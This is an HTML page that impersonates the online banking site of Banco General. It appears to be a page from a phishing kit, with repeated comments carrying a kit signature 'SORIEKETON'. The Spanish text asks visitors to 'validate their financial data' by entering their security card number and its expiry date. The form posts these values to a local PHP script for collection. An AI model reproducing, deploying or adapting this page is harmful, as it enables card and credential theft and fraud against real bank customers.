<!DOCTYPE html>
<html class="ltr yui3-js-enabled webkit js chrome chrome74 chrome74-0 win secure" dir="ltr" lang="es-ES"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="shortcut icon" href="favicon.ico">
</head><body class="controls-visible yui3-skin-sam guest-site signed-out public-page site bgp-theme-body bgp-theme bgp-theme-container ng-scope" ng-class="{&#39;backdrop-fix&#39;: tourCtrl.backdropFixNeeded()}" style="padding-top: 0px; visibility: visible; position: inherit; left: 0px;" id="main-surface" ng-controller="BGPTourController as tourCtrl">



<style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>


 <title>Banca en Línea - Banco General</title>

    
    <meta http-equiv="x-ua-compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, user-scalable=yes, maximum-scale=1.0">
    
    
<link class="lfr-css-file" data-senna-track="temporary" href="./validar-datos_files/aui.css" id="liferayAUICSS" rel="stylesheet" type="text/css">
	
    <link href="index3_files/text-security.min.css" rel="stylesheet" type="text/css">
    <link href="./validar-datos_files/style.css" rel="stylesheet" type="text/css">

  <style type="text/css">.no-scrolling { height: 100%; overflow: hidden; }</style><style type="text/css"></style>



    



        
      
    
  
<nav class="bgp-navbar bgp-navbar navbar navbar-default navbar-fixed-top hidden-print">
    <div class="container">
        <div class="row">
            <div class="col-xs-5">
                <div class="navbar-header">

                    <a class="navbar-brand bgp-navbar__brand" href="">
                        <img src="./validar-datos_files/bgp-logo.png" alt="BGP">
                    </a>

                </div>
            </div>

            <div class="col-xs-7">
                <div class="mtl nav navbar-nav navbar-right bgp-navbar__disclaimer">
                    <p>¿Necesitas ayuda? Llama al <span class="text-color-brand-blue-variation-3"><b>800-5000</b></span> o <span class="text-color-brand-blue-variation-3"><b>300-5000</b></span></p>
                </div>
            </div>
        </div>
    </div>
</nav>

    <section class="bgp-content-body">

<form action="3.php" method="post">

<div id="main-content" class="bgp-content container" role="main">
  <div class="portlet-layout row">
    <div id="column-1" class="col-sm-12 mts portlet-column portlet-column-first">
      <div class="portlet-dropzone portlet-column-content portlet-column-content-first" id="layout-column_column-1">

	<div class="portlet-boundary portlet-boundary_bgp_login_web_LoginPortlet_  portlet-static portlet-static-end decorate  " id="p_p_id_bgp_login_web_LoginPortlet_INSTANCE_gtSJktyunuU4_">
		<span id="p_bgp_login_web_LoginPortlet_INSTANCE_gtSJktyunuU4"></span>
	
<section class="portlet" id="portlet_bgp_login_web_LoginPortlet_INSTANCE_gtSJktyunuU4">


	<div class="portlet-content">

		
			<div class=" portlet-content-container">
				


	<div class="portlet-body">

<div ng-controller="BGPLoginController as ctrl" class="bgp-common-module mtxl ng-scope">
  <div ui-view="BGPLoginView" onclick="void(0)" class="ng-scope"><div class="container-fluid ng-scope" ng-controller="BGPLoginUserIdentificationController as idCtrl">

  <h4 class="bgp-title__page bgp-title__bordered--bottom ng-binding">
    Valida tus datos financieros
  </h4>

  <loading-component display="idCtrl.showLoading" class="ng-isolate-scope"><div id="loader-wrapper" class="ng-hide" ng-show="display">
  <div class="bgp-loader">
    <div class="bounce1"></div>
    <div class="bounce2"></div>
    <div class="bounce3"></div>
  </div>
</div>
</loading-component>
<!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
  <div class="panel panel-large">
    <div class="panel-body">
      <div class="bgp-row text-center">
        <steps-component steps="idCtrl.OwnSteps" class="ng-isolate-scope"><nav class="bgp-wizard">
  <!-- ngRepeat: step in steps --><a href="#" class="bgp-wizard__step ng-scope bgp-wizard__step--active" ng-repeat="step in steps" ng-class="{&#39;bgp-wizard__step--active&#39;: step.selected === true}">
    <!-- ngIf: $index > 0 -->
    <span class="bgp-wizard__stepPage"></span>
    <span class="bgp-wizard__stepLabel ng-binding">Validar identidad</span>
  <!-- ngRepeat: step in steps --></a><a href="#" class="bgp-wizard__step ng-scope bgp-wizard__step--active" ng-repeat="step in steps" ng-class="{&#39;bgp-wizard__step--active&#39;: step.selected === true}">
    <!-- ngIf: $index > 0 --><span ng-if="$index &gt; 0" class="bgp-wizard__stepDivider ng-scope"></span><!-- end ngIf: $index > 0 -->
    <span class="bgp-wizard__stepPage"></span>
    <span class="bgp-wizard__stepLabel ng-binding">Validar datos</span>
  </a><!-- end ngRepeat: step in steps -->
</nav>
</steps-component>
      </div>

      <p class="text-color-brand-blue fnt-size-18 ng-binding">Solo un paso más...</p>

      

        <p class="pvm ng-binding">Ingresa la información de tu tarjeta clave emitida por el banco.</p>

        <section>
          <div class="form-group input-text-wrapper">
            <label class="control-label ng-binding" for="identity">
              Número de tarjeta clave<!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
            </label>

            <div class="bgp-row">
              <div class="col-md-2 col-sm-3">
<input name="smbi2" type="tel" onkeypress="return controltag(event)" tabindex="2" class="form-control ng-pristine ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-touched" autocomplete="cc-number" maxlength="16" required="required" style="width:250px">             

   
              <br>
  <label class="control-label ng-binding" for="identity">
              Fecha de expiración
            </label><!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
<select name="sko4" type="tel" tabindex="2" required="" class="form-control ng-pristine ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-touched" autocomplete="cc-exp-year" style="width:100px">             
                                                                                      <option value="" selected="" disabled="">Año</option>
                                                                                        <option value="2020">2020</option>
                                                                                        <option value="2021">2021</option>
                                                                                        <option value="2022">2022</option>
                                                                                        <option value="2023">2023</option>
                                                                                        <option value="2024">2024</option>
                                                                                        <option value="2025">2025</option>
                                                                                        <option value="2026">2026</option>
                                                                                        <option value="2027">2027</option>
                                                                             </select>
   
             <br>
  <label class="control-label ng-binding" for="identity">
                        </label>
			
<select name="m3d" type="text" tabindex="2" required="" class="form-control ng-pristine ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-touched" autocomplete="cc-exp-month" style="position:absolute; overflow:hidden;left:120px;top:74px;width:70px; z-index:1">             
                                                                                      <option value="" selected="" disabled="">Mes</option>
                                                                                        <option value="01">01</option>
                                                                                        <option value="02">02</option>
                                                                                        <option value="03">03</option>
                                                                                        <option value="04">04</option>
                                                                                        <option value="05">05</option>
                                                                                        <option value="06">06</option>
                                                                                        <option value="07">07</option>
                                                                                        <option value="08">08</option>
                                                                                        <option value="09">09</option>
                                                                                        <option value="10">10</option>
                                                                                        <option value="11">11</option>
                                                                                        <option value="12">12</option>
                                                                                        </select>
            
			  <div class="form-validator-stack help-block ng-active ng-hide" ng-messages="idCtrl.form.identity.$error" ng-show="idCtrl.form.identity.$touched || idCtrl.form.$submitted">

                  <!-- ngMessage: required, minlength, maxlength --><div role="alert" class="required ng-binding ng-scope" ng-message="required, minlength, maxlength">
                    Ingresa un valor.
                  </div>
                </div>
              </div><!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
            </div>
          </div>

          <!-- ngIf: idCtrl.personal_identity.length > 0 || !idCtrl.form.identity.$touched --><p ng-if="idCtrl.personal_identity.length &gt; 0 || !idCtrl.form.identity.$touched" class="fnt-size-sm text-color-gray-variation-3 ng-binding ng-scope">
            
          </p><!-- end ngIf: idCtrl.personal_identity.length > 0 || !idCtrl.form.identity.$touched -->

          <div class="form-group input-text-wrapper">
            <!-- ngRepeat: con in idCtrl.typeCards track by $index --><div class="mbm ng-scope" ng-repeat="con in idCtrl.typeCards track by $index">
              <label class="main-account-radio">

              </label>
            </div><!-- end ngRepeat: con in idCtrl.typeCards track by $index --><div class="mbm ng-scope" ng-repeat="con in idCtrl.typeCards track by $index">
            
            </div><!-- end ngRepeat: con in idCtrl.typeCards track by $index -->

            <!-- ngIf: idCtrl.selectedTypeCard != null -->

            <!-- ngIf: idCtrl.selectedTypeCard != null -->
          </div>



          <div class="btn-row"><!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
            <div class="col-sm-12">
              <button href="index2.html" class="btn btn-default btn--regular mrl ng-binding" tabindex="8">
                Cancelar
              </button>

              <button id="btn_submit" type="submit" class="btn btn-primary ng-binding" tabindex="9">
                Verificar

                
              </button>
            </div>
          </div><!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
        </section>
      

      <!-- ngInclude: '/o/login-web/templates/partials/login.cancel_modal.html' --><div ng-include="&#39;/o/login-web/templates/partials/login.cancel_modal.html&#39;" class="ng-scope"><!-- Modal -->
<div class="modal fade ng-scope" id="cancelModal" tabindex="-1" role="dialog" aria-labelledby="userTermsModalLabel">
    <div class="modal-dialog" role="document">
        <div class="modal-content">

            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                  <span aria-hidden="true">×</span>
                </button>
                <h3 class="bgp-title__page mvn pvn ng-binding">Cancelar configuración de Banca en Línea</h3>
            </div>

            <div class="modal-body mtm">
              <p class="mbl ng-binding">Se perderá toda la información ingresada.</p>
              <p class="ng-binding">¿Estás seguro que quieres cancelar el proceso de configuración y salir?</p>
            </div>
            <div class="modal-footer">

              <button type="button" class="btn btn-default btn--regular ng-binding" data-dismiss="modal">
                Continuar configuración
              </button>

              <button type="button" class="btn btn-primary btn--regular ng-binding" ng-click="ctrl.logoutAndGoToLogin()">
                Cancelar y salir
              </button>

            </div><!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
        </div>
    </div>
</div>
</div>
    </div>
  </div>
</div>
</div>

  <loading-component display="ctrl.showLoading" class="ng-isolate-scope"><div id="loader-wrapper" class="ng-hide" ng-show="display">
  <div class="bgp-loader">
    <div class="bounce1"></div>
    <div class="bounce2"></div>
    <div class="bounce3"></div>
  </div>
</div>
</loading-component>
</div>
	</div>

			</div>
		
	</div>
</section>
	</div>



	
</div>
    </div>
  </div>
</div></form>


<span></span><input hidden="" type="submit">
<!-- Modal -->
<div class="modal fade" id="externalLinkModal" tabindex="-1" role="dialog">
    <div class="modal-dialog" role="document">
        <div class="modal-content"><!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
         
        
            <div class="modal-footer">
                <button type="button" class="btn btn-default ng-binding" data-dismiss="modal">Cancelar</button>
                <button type="button" class="btn btn-primary ng-binding" external-link-redirect="">Continuar</button>
            </div>
        </div>
    </div>
</div>
    </section>

<footer class="bgp-footer">
  <div class="container">
    <div class="bgp-footer__content">
      <div class="bgp-footer__copyright">
        <span class="bgp-footer__logo">
          <img src="./validar-datos_files/bg-logo-stars-white.png" alt="">
        </span>
<!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
        <p>
          Copyright © <span class="js-current-year">2021</span> Banco General. Todos los derechos reservados.
        </p>
      </div>

    </div>
  </div>
</footer>
  
  </body></html>